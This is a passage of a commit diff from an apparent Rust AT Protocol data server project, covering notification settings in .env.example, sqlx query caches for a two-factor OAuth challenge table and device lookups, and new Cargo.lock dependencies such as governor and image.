+9
-8
.env.example
+9
-8
.env.example
···
13
PDS_HOSTNAME=localhost:3000
14
PLC_URL=plc.directory
15
16
-
# A comma-separated list of WebSocket URLs for firehose relays to push updates to.
17
-
# e.g., RELAYS=wss://relay.bsky.social,wss://another-relay.com
18
-
RELAYS=
19
20
# Notification Service Configuration
21
# At least one notification channel should be configured for user notifications to work.
22
# Email notifications (via sendmail/msmtp)
23
# MAIL_FROM_ADDRESS=noreply@example.com
24
# MAIL_FROM_NAME=My PDS
25
# SENDMAIL_PATH=/usr/sbin/sendmail
26
27
-
# Discord notifications (not yet implemented)
28
-
# DISCORD_BOT_TOKEN=your-bot-token
29
30
-
# Telegram notifications (not yet implemented)
31
# TELEGRAM_BOT_TOKEN=your-bot-token
32
33
-
# Signal notifications (not yet implemented)
34
# SIGNAL_CLI_PATH=/usr/local/bin/signal-cli
35
-
# SIGNAL_PHONE_NUMBER=+1234567890
36
37
CARGO_MOMMYS_LITTLE=mister
38
CARGO_MOMMYS_PRONOUNS=his
···
13
PDS_HOSTNAME=localhost:3000
14
PLC_URL=plc.directory
15
16
+
# A comma-separated list of relay URLs to notify via requestCrawl when we have updates.
17
+
# e.g., CRAWLERS=https://bsky.network
18
+
CRAWLERS=
19
20
# Notification Service Configuration
21
# At least one notification channel should be configured for user notifications to work.
22
+
23
# Email notifications (via sendmail/msmtp)
24
# MAIL_FROM_ADDRESS=noreply@example.com
25
# MAIL_FROM_NAME=My PDS
26
# SENDMAIL_PATH=/usr/sbin/sendmail
27
28
+
# Discord notifications (via webhook)
29
+
# DISCORD_WEBHOOK_URL=https://discord.com/api/webhooks/...
30
31
+
# Telegram notifications (via bot)
32
# TELEGRAM_BOT_TOKEN=your-bot-token
33
34
+
# Signal notifications (via signal-cli)
35
# SIGNAL_CLI_PATH=/usr/local/bin/signal-cli
36
+
# SIGNAL_SENDER_NUMBER=+1234567890
37
38
CARGO_MOMMYS_LITTLE=mister
39
CARGO_MOMMYS_PRONOUNS=his
+34
.sqlx/query-0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e.json
+34
.sqlx/query-0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "SELECT preferred_notification_channel as \"channel: NotificationChannel\" FROM users WHERE did = $1",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "channel: NotificationChannel",
9
+
"type_info": {
10
+
"Custom": {
11
+
"name": "notification_channel",
12
+
"kind": {
13
+
"Enum": [
14
+
"email",
15
+
"discord",
16
+
"telegram",
17
+
"signal"
18
+
]
19
+
}
20
+
}
21
+
}
22
+
}
23
+
],
24
+
"parameters": {
25
+
"Left": [
26
+
"Text"
27
+
]
28
+
},
29
+
"nullable": [
30
+
false
31
+
]
32
+
},
33
+
"hash": "0cbeeffaf2cf782de4e9d886e26b9884e874735e76b50c42933a94d9fa70425e"
34
+
}
+61
.sqlx/query-0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f.json
+61
.sqlx/query-0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n INSERT INTO oauth_2fa_challenge (did, request_uri, code, expires_at)\n VALUES ($1, $2, $3, $4)\n RETURNING id, did, request_uri, code, attempts, created_at, expires_at\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "did",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "request_uri",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "code",
24
+
"type_info": "Text"
25
+
},
26
+
{
27
+
"ordinal": 4,
28
+
"name": "attempts",
29
+
"type_info": "Int4"
30
+
},
31
+
{
32
+
"ordinal": 5,
33
+
"name": "created_at",
34
+
"type_info": "Timestamptz"
35
+
},
36
+
{
37
+
"ordinal": 6,
38
+
"name": "expires_at",
39
+
"type_info": "Timestamptz"
40
+
}
41
+
],
42
+
"parameters": {
43
+
"Left": [
44
+
"Text",
45
+
"Text",
46
+
"Text",
47
+
"Timestamptz"
48
+
]
49
+
},
50
+
"nullable": [
51
+
false,
52
+
false,
53
+
false,
54
+
false,
55
+
false,
56
+
false,
57
+
false
58
+
]
59
+
},
60
+
"hash": "0d59bd89c410dfceaa7eabcd028415c8f3218755a4cd1730d5f800057b9b369f"
61
+
}
+22
.sqlx/query-180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09.json
+22
.sqlx/query-180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT two_factor_enabled\n FROM users\n WHERE did = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "two_factor_enabled",
9
+
"type_info": "Bool"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Text"
15
+
]
16
+
},
17
+
"nullable": [
18
+
false
19
+
]
20
+
},
21
+
"hash": "180e9287d4e7f0d2b074518aa3ae2c1ab276e486b4c2ebaaac299fa77414ef09"
22
+
}
-30
.sqlx/query-243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1.json
-30
.sqlx/query-243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey ASC LIMIT $3",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Int8"
22
-
]
23
-
},
24
-
"nullable": [
25
-
false,
26
-
false
27
-
]
28
-
},
29
-
"hash": "243ff4911a7d36354e60005af13f6c7d854dc48b8c0d3674f3cbdfd60b61c9d1"
30
-
}
···
-30
.sqlx/query-2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c.json
-30
.sqlx/query-2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 ORDER BY rkey DESC LIMIT $3",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Int8"
22
-
]
23
-
},
24
-
"nullable": [
25
-
false,
26
-
false
27
-
]
28
-
},
29
-
"hash": "2d37a447ec4dbdb6dfd5ab8c12d1ce88b9be04d6c7b4744891352a9a3bed4f3c"
30
-
}
···
+2
-1
.sqlx/query-303777d97e6ed344f8c699eae37b7b0c241c734a5b7726019c2a59ae277caee6.json
+2
-1
.sqlx/query-303777d97e6ed344f8c699eae37b7b0c241c734a5b7726019c2a59ae277caee6.json
-31
.sqlx/query-347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e.json
-31
.sqlx/query-347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey > $3 ORDER BY rkey ASC LIMIT $4",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Text",
22
-
"Int8"
23
-
]
24
-
},
25
-
"nullable": [
26
-
false,
27
-
false
28
-
]
29
-
},
30
-
"hash": "347e3570a201ee339904aab43f0519ff631f160c97453e9e8aef04756cbc424e"
31
-
}
···
-31
.sqlx/query-4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15.json
-31
.sqlx/query-4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "SELECT rkey, record_cid FROM records WHERE repo_id = $1 AND collection = $2 AND rkey < $3 ORDER BY rkey DESC LIMIT $4",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "rkey",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "record_cid",
14
-
"type_info": "Text"
15
-
}
16
-
],
17
-
"parameters": {
18
-
"Left": [
19
-
"Uuid",
20
-
"Text",
21
-
"Text",
22
-
"Int8"
23
-
]
24
-
},
25
-
"nullable": [
26
-
false,
27
-
false
28
-
]
29
-
},
30
-
"hash": "4343e751b03e24387f6603908a1582d20fdfa58a8e4c17c1628acc6b6f2ded15"
31
-
}
···
+76
.sqlx/query-458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810.json
+76
.sqlx/query-458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT id, did, email, password_hash, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\",\n deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "did",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "email",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "password_hash",
24
+
"type_info": "Text"
25
+
},
26
+
{
27
+
"ordinal": 4,
28
+
"name": "two_factor_enabled",
29
+
"type_info": "Bool"
30
+
},
31
+
{
32
+
"ordinal": 5,
33
+
"name": "preferred_notification_channel: NotificationChannel",
34
+
"type_info": {
35
+
"Custom": {
36
+
"name": "notification_channel",
37
+
"kind": {
38
+
"Enum": [
39
+
"email",
40
+
"discord",
41
+
"telegram",
42
+
"signal"
43
+
]
44
+
}
45
+
}
46
+
}
47
+
},
48
+
{
49
+
"ordinal": 6,
50
+
"name": "deactivated_at",
51
+
"type_info": "Timestamptz"
52
+
},
53
+
{
54
+
"ordinal": 7,
55
+
"name": "takedown_ref",
56
+
"type_info": "Text"
57
+
}
58
+
],
59
+
"parameters": {
60
+
"Left": [
61
+
"Text"
62
+
]
63
+
},
64
+
"nullable": [
65
+
false,
66
+
false,
67
+
false,
68
+
false,
69
+
false,
70
+
false,
71
+
true,
72
+
true
73
+
]
74
+
},
75
+
"hash": "458c98edc9c01286dc2677fcff82c1f84c5db138fdef9a8e8756771c30b66810"
76
+
}
+22
.sqlx/query-4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6.json
+22
.sqlx/query-4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n UPDATE oauth_2fa_challenge\n SET attempts = attempts + 1\n WHERE id = $1\n RETURNING attempts\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "attempts",
9
+
"type_info": "Int4"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Uuid"
15
+
]
16
+
},
17
+
"nullable": [
18
+
false
19
+
]
20
+
},
21
+
"hash": "4d52c04129df85efcab747dfd38dc7b5fbd46d8b83c753319cba264ecf6d7df6"
22
+
}
+2
-1
.sqlx/query-5d49bbf0307a0c642b0174d641de748fa648c97f8109255120e969c957ff95bf.json
+2
-1
.sqlx/query-5d49bbf0307a0c642b0174d641de748fa648c97f8109255120e969c957ff95bf.json
+46
.sqlx/query-62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f.json
+46
.sqlx/query-62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT id, two_factor_enabled,\n preferred_notification_channel as \"preferred_notification_channel: NotificationChannel\"\n FROM users\n WHERE did = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "two_factor_enabled",
14
+
"type_info": "Bool"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "preferred_notification_channel: NotificationChannel",
19
+
"type_info": {
20
+
"Custom": {
21
+
"name": "notification_channel",
22
+
"kind": {
23
+
"Enum": [
24
+
"email",
25
+
"discord",
26
+
"telegram",
27
+
"signal"
28
+
]
29
+
}
30
+
}
31
+
}
32
+
}
33
+
],
34
+
"parameters": {
35
+
"Left": [
36
+
"Text"
37
+
]
38
+
},
39
+
"nullable": [
40
+
false,
41
+
false,
42
+
false
43
+
]
44
+
},
45
+
"hash": "62f66fad54498d5c598af54de795e395f71596a6d6a88d2be64ce86256a9860f"
46
+
}
+14
.sqlx/query-6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4.json
+14
.sqlx/query-6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n DELETE FROM oauth_2fa_challenge WHERE request_uri = $1\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Text"
9
+
]
10
+
},
11
+
"nullable": []
12
+
},
13
+
"hash": "6be6cd9d43002aa9e2bd337e26228771d527d4a683f4a273248e9cd91fdfd7a4"
14
+
}
+14
.sqlx/query-7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5.json
+14
.sqlx/query-7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n DELETE FROM oauth_2fa_challenge WHERE id = $1\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": [
8
+
"Uuid"
9
+
]
10
+
},
11
+
"nullable": []
12
+
},
13
+
"hash": "7d1246fb9125ebdfa6d4896942411ea0d6766d6a8840ae2b0589c42c0de79fc5"
14
+
}
+40
.sqlx/query-841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb.json
+40
.sqlx/query-841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT u.did, u.handle, u.email, ad.updated_at as last_used_at\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ORDER BY ad.updated_at DESC\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "did",
9
+
"type_info": "Text"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "handle",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "email",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "last_used_at",
24
+
"type_info": "Timestamptz"
25
+
}
26
+
],
27
+
"parameters": {
28
+
"Left": [
29
+
"Text"
30
+
]
31
+
},
32
+
"nullable": [
33
+
false,
34
+
false,
35
+
false,
36
+
false
37
+
]
38
+
},
39
+
"hash": "841452a9e325ea5f4ae3bff00cd77c98667913225305df559559e36110516cfb"
40
+
}
+58
.sqlx/query-881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708.json
+58
.sqlx/query-881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT id, did, request_uri, code, attempts, created_at, expires_at\n FROM oauth_2fa_challenge\n WHERE request_uri = $1\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "id",
9
+
"type_info": "Uuid"
10
+
},
11
+
{
12
+
"ordinal": 1,
13
+
"name": "did",
14
+
"type_info": "Text"
15
+
},
16
+
{
17
+
"ordinal": 2,
18
+
"name": "request_uri",
19
+
"type_info": "Text"
20
+
},
21
+
{
22
+
"ordinal": 3,
23
+
"name": "code",
24
+
"type_info": "Text"
25
+
},
26
+
{
27
+
"ordinal": 4,
28
+
"name": "attempts",
29
+
"type_info": "Int4"
30
+
},
31
+
{
32
+
"ordinal": 5,
33
+
"name": "created_at",
34
+
"type_info": "Timestamptz"
35
+
},
36
+
{
37
+
"ordinal": 6,
38
+
"name": "expires_at",
39
+
"type_info": "Timestamptz"
40
+
}
41
+
],
42
+
"parameters": {
43
+
"Left": [
44
+
"Text"
45
+
]
46
+
},
47
+
"nullable": [
48
+
false,
49
+
false,
50
+
false,
51
+
false,
52
+
false,
53
+
false,
54
+
false
55
+
]
56
+
},
57
+
"hash": "881b03f9f19aba8f65feaab97570d27c1afd00181ce495a5903a47fbfe243708"
58
+
}
-40
.sqlx/query-91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43.json
-40
.sqlx/query-91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43.json
···
1
-
{
2
-
"db_name": "PostgreSQL",
3
-
"query": "\n SELECT did, password_hash, deactivated_at, takedown_ref\n FROM users\n WHERE handle = $1 OR email = $1\n ",
4
-
"describe": {
5
-
"columns": [
6
-
{
7
-
"ordinal": 0,
8
-
"name": "did",
9
-
"type_info": "Text"
10
-
},
11
-
{
12
-
"ordinal": 1,
13
-
"name": "password_hash",
14
-
"type_info": "Text"
15
-
},
16
-
{
17
-
"ordinal": 2,
18
-
"name": "deactivated_at",
19
-
"type_info": "Timestamptz"
20
-
},
21
-
{
22
-
"ordinal": 3,
23
-
"name": "takedown_ref",
24
-
"type_info": "Text"
25
-
}
26
-
],
27
-
"parameters": {
28
-
"Left": [
29
-
"Text"
30
-
]
31
-
},
32
-
"nullable": [
33
-
false,
34
-
false,
35
-
true,
36
-
true
37
-
]
38
-
},
39
-
"hash": "91ab872f41891370baf9d405e8812b8d4cfb0b7555430eb45f16fe550fac4b43"
40
-
}
···
+23
.sqlx/query-a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b.json
+23
.sqlx/query-a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n SELECT 1 as exists\n FROM oauth_account_device ad\n JOIN users u ON u.did = ad.did\n WHERE ad.device_id = $1\n AND ad.did = $2\n AND u.deactivated_at IS NULL\n AND u.takedown_ref IS NULL\n ",
4
+
"describe": {
5
+
"columns": [
6
+
{
7
+
"ordinal": 0,
8
+
"name": "exists",
9
+
"type_info": "Int4"
10
+
}
11
+
],
12
+
"parameters": {
13
+
"Left": [
14
+
"Text",
15
+
"Text"
16
+
]
17
+
},
18
+
"nullable": [
19
+
null
20
+
]
21
+
},
22
+
"hash": "a32e91d22d66deba7b9bfae2c965d17c3074c0eea7c2bf5b1f2ea07ba61eeb3b"
23
+
}
+12
.sqlx/query-bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac.json
+12
.sqlx/query-bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac.json
···
···
1
+
{
2
+
"db_name": "PostgreSQL",
3
+
"query": "\n DELETE FROM oauth_2fa_challenge WHERE expires_at < NOW()\n ",
4
+
"describe": {
5
+
"columns": [],
6
+
"parameters": {
7
+
"Left": []
8
+
},
9
+
"nullable": []
10
+
},
11
+
"hash": "bc31134e6927444993555d2f2d56bc0f5e42d3511f9daa00a0bb677ce48072ac"
12
+
}
+2
-1
.sqlx/query-cb6f48aaba124c79308d20e66c23adb44d1196296b7f93fad19b2d17548ed3de.json
+2
-1
.sqlx/query-cb6f48aaba124c79308d20e66c23adb44d1196296b7f93fad19b2d17548ed3de.json
+206
-1
Cargo.lock
+206
-1
Cargo.lock
···
915
"dotenvy",
916
"ed25519-dalek",
917
"futures",
918
"hkdf",
919
"hmac",
920
"ipld-core",
921
"iroh-car",
922
"jacquard",
···
986
checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e"
987
988
[[package]]
989
name = "byteorder"
990
version = "1.5.0"
991
source = "registry+https://github.com/rust-lang/crates.io-index"
992
checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
993
994
[[package]]
995
name = "bytes"
···
1156
dependencies = [
1157
"cc",
1158
]
1159
1160
[[package]]
1161
name = "compression-codecs"
···
1820
checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
1821
1822
[[package]]
1823
name = "ferroid"
1824
version = "0.8.7"
1825
source = "registry+https://github.com/rust-lang/crates.io-index"
···
1906
version = "0.1.5"
1907
source = "registry+https://github.com/rust-lang/crates.io-index"
1908
checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
1909
1910
[[package]]
1911
name = "foreign-types"
···
2056
checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
2057
2058
[[package]]
2059
name = "futures-util"
2060
version = "0.3.31"
2061
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2136
]
2137
2138
[[package]]
2139
name = "glob"
2140
version = "0.3.3"
2141
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2170
]
2171
2172
[[package]]
2173
name = "group"
2174
version = "0.12.1"
2175
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2260
dependencies = [
2261
"allocator-api2",
2262
"equivalent",
2263
-
"foldhash",
2264
]
2265
2266
[[package]]
···
2268
version = "0.16.1"
2269
source = "registry+https://github.com/rust-lang/crates.io-index"
2270
checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
2271
2272
[[package]]
2273
name = "hashlink"
···
2760
]
2761
2762
[[package]]
2763
name = "indexmap"
2764
version = "1.9.3"
2765
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3477
]
3478
3479
[[package]]
3480
name = "multibase"
3481
version = "0.9.2"
3482
source = "registry+https://github.com/rust-lang/crates.io-index"
···
3552
"memchr",
3553
"minimal-lexical",
3554
]
3555
3556
[[package]]
3557
name = "nu-ansi-term"
···
3976
checksum = "7edddbd0b52d732b21ad9a5fab5c704c14cd949e5e9a1ec5929a24fded1b904c"
3977
3978
[[package]]
3979
name = "polyval"
3980
version = "0.6.2"
3981
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4132
]
4133
4134
[[package]]
4135
name = "quinn"
4136
version = "0.11.9"
4137
source = "registry+https://github.com/rust-lang/crates.io-index"
···
4265
version = "0.3.2"
4266
source = "registry+https://github.com/rust-lang/crates.io-index"
4267
checksum = "d20581732dd76fa913c7dff1a2412b714afe3573e94d41c34719de73337cc8ab"
4268
4269
[[package]]
4270
name = "redox_syscall"
···
5034
checksum = "d5fe4ccb98d9c292d56fec89a5e07da7fc4cf0dc11e156b41793132775d3e591"
5035
5036
[[package]]
5037
name = "spki"
5038
version = "0.6.0"
5039
source = "registry+https://github.com/rust-lang/crates.io-index"
···
6221
]
6222
6223
[[package]]
6224
name = "whoami"
6225
version = "1.6.1"
6226
source = "registry+https://github.com/rust-lang/crates.io-index"
···
6831
"quote",
6832
"syn 2.0.111",
6833
]
···
915
"dotenvy",
916
"ed25519-dalek",
917
"futures",
918
+
"governor",
919
"hkdf",
920
"hmac",
921
+
"image",
922
"ipld-core",
923
"iroh-car",
924
"jacquard",
···
988
checksum = "175812e0be2bccb6abe50bb8d566126198344f707e304f45c648fd8f2cc0365e"
989
990
[[package]]
991
+
name = "bytemuck"
992
+
version = "1.24.0"
993
+
source = "registry+https://github.com/rust-lang/crates.io-index"
994
+
checksum = "1fbdf580320f38b612e485521afda1ee26d10cc9884efaaa750d383e13e3c5f4"
995
+
996
+
[[package]]
997
name = "byteorder"
998
version = "1.5.0"
999
source = "registry+https://github.com/rust-lang/crates.io-index"
1000
checksum = "1fd0f2584146f6f2ef48085050886acf353beff7305ebd1ae69500e27c67f64b"
1001
+
1002
+
[[package]]
1003
+
name = "byteorder-lite"
1004
+
version = "0.1.0"
1005
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1006
+
checksum = "8f1fe948ff07f4bd06c30984e69f5b4899c516a3ef74f34df92a2df2ab535495"
1007
1008
[[package]]
1009
name = "bytes"
···
1170
dependencies = [
1171
"cc",
1172
]
1173
+
1174
+
[[package]]
1175
+
name = "color_quant"
1176
+
version = "1.1.0"
1177
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1178
+
checksum = "3d7b894f5411737b7867f4827955924d7c254fc9f4d91a6aad6b097804b1018b"
1179
1180
[[package]]
1181
name = "compression-codecs"
···
1840
checksum = "37909eebbb50d72f9059c3b6d82c0463f2ff062c9e95845c43a6c9c0355411be"
1841
1842
[[package]]
1843
+
name = "fdeflate"
1844
+
version = "0.3.7"
1845
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1846
+
checksum = "1e6853b52649d4ac5c0bd02320cddc5ba956bdb407c4b75a2c6b75bf51500f8c"
1847
+
dependencies = [
1848
+
"simd-adler32",
1849
+
]
1850
+
1851
+
[[package]]
1852
name = "ferroid"
1853
version = "0.8.7"
1854
source = "registry+https://github.com/rust-lang/crates.io-index"
···
1935
version = "0.1.5"
1936
source = "registry+https://github.com/rust-lang/crates.io-index"
1937
checksum = "d9c4f5dac5e15c24eb999c26181a6ca40b39fe946cbe4c263c7209467bc83af2"
1938
+
1939
+
[[package]]
1940
+
name = "foldhash"
1941
+
version = "0.2.0"
1942
+
source = "registry+https://github.com/rust-lang/crates.io-index"
1943
+
checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb"
1944
1945
[[package]]
1946
name = "foreign-types"
···
2091
checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988"
2092
2093
[[package]]
2094
+
name = "futures-timer"
2095
+
version = "3.0.3"
2096
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2097
+
checksum = "f288b0a4f20f9a56b5d1da57e2227c661b7b16168e2f72365f57b63326e29b24"
2098
+
2099
+
[[package]]
2100
name = "futures-util"
2101
version = "0.3.31"
2102
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2177
]
2178
2179
[[package]]
2180
+
name = "gif"
2181
+
version = "0.14.1"
2182
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2183
+
checksum = "f5df2ba84018d80c213569363bdcd0c64e6933c67fe4c1d60ecf822971a3c35e"
2184
+
dependencies = [
2185
+
"color_quant",
2186
+
"weezl",
2187
+
]
2188
+
2189
+
[[package]]
2190
name = "glob"
2191
version = "0.3.3"
2192
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2221
]
2222
2223
[[package]]
2224
+
name = "governor"
2225
+
version = "0.10.2"
2226
+
source = "registry+https://github.com/rust-lang/crates.io-index"
2227
+
checksum = "6e23d5986fd4364c2fb7498523540618b4b8d92eec6c36a02e565f66748e2f79"
2228
+
dependencies = [
2229
+
"cfg-if",
2230
+
"dashmap 6.1.0",
2231
+
"futures-sink",
2232
+
"futures-timer",
2233
+
"futures-util",
2234
+
"getrandom 0.3.4",
2235
+
"hashbrown 0.16.1",
2236
+
"nonzero_ext",
2237
+
"parking_lot",
2238
+
"portable-atomic",
2239
+
"quanta",
2240
+
"rand 0.9.2",
2241
+
"smallvec",
2242
+
"spinning_top",
2243
+
"web-time",
2244
+
]
2245
+
2246
+
[[package]]
2247
name = "group"
2248
version = "0.12.1"
2249
source = "registry+https://github.com/rust-lang/crates.io-index"
···
2334
dependencies = [
2335
"allocator-api2",
2336
"equivalent",
2337
+
"foldhash 0.1.5",
2338
]
2339
2340
[[package]]
···
2342
version = "0.16.1"
2343
source = "registry+https://github.com/rust-lang/crates.io-index"
2344
checksum = "841d1cc9bed7f9236f321df977030373f4a4163ae1a7dbfe1a51a2c1a51d9100"
2345
+
dependencies = [
2346
+
"allocator-api2",
2347
+
"equivalent",
2348
+
"foldhash 0.2.0",
2349
+
]
2350
2351
[[package]]
2352
name = "hashlink"
···
2839
]
2840
2841
[[package]]
2842
+
name = "image"
2843
+
version = "0.25.9"
2844
+
